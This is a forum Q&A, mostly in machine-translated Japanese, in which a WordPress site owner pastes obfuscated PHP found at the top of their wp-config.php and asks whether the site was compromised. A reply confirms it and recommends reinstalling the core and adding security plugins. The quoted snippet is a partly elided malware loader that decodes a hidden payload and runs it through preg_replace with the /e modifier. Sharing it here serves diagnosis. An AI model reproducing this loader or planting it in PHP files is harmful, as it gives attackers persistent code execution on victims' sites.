私は自分のWPサイトの1つが先月アクセスされず、その結果更新もされていないことに気づかなかった、そして今日私は私のconfig.php
がファイルの最初にいくらかゴミを持っているのを見つけた:
<?php $uqnrguvics = 'x7825r% ... more garbage ...
825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y3/(.*)/epreg_replacezrxmuexghf';
$uvozcxjtxg = explode(chr((253-209)),'4137,25,2713,60,8524,67 ... more garbage ...
'); $tuyrkvuamr=substr($uqnrguvics,(49619-39513),(27-20));
if (!function_exists('zpjgeglbtt')) { function zpjgeglbtt($lwtbhpepkn, $lkvuvnwcsu) {
$sblzyeefjv = NULL; for($mxodybdogx=0;$mxodybdogx<(sizeof($lwtbhpepkn)/2);$mxodybdogx++)
{ $sblzyeefjv .= substr($lkvuvnwcsu, $lwtbhpepkn[($mxodybdogx*2)],
$lwtbhpepkn[($mxodybdogx*2)+1]); }
return $sblzyeefjv; };} $rudmfyfhqb="\ x20\57... hex garbage ... \52\x2f\40";
$vkyezvmvec=substr($uqnrguvics,(42452-32339),(65-53));
$vkyezvmvec($tuyrkvuamr, $rudmfyfhqb, NULL); $vkyezvmvec=$rudmfyfhqb;
$vkyezvmvec=(811-690); $uqnrguvics=$vkyezvmvec-1; ?>
<?php
HERE comes an usual wp-config.php, which as far as I remember is the one I had before
私はLinux上で実行していますが、このファイルにはDOSエンコーディングもあります。
(改行を含みます).
これは、このインストールが危険にさらされたという意味ですか?それとも、これはWPによって自動的に組み込まれたものですか。
そうであれば、管理者パスワードを変更するだけで十分ですか? adminとしてログインしても異常なことは何も表示されません。
はい、そうです。私の経験では、すべてのトレースが確実に潰されたことを確認するために、新しいWordPressコアを再アップロードすることをお勧めします。
それは起こります...もしあなたがまだセキュリティプラグインを使っていないのなら私はWordfenceとBruteProtectがブルートフォース攻撃を防ぐためにあなたのコアWordPressファイルの変更をチェックすることをお勧めします。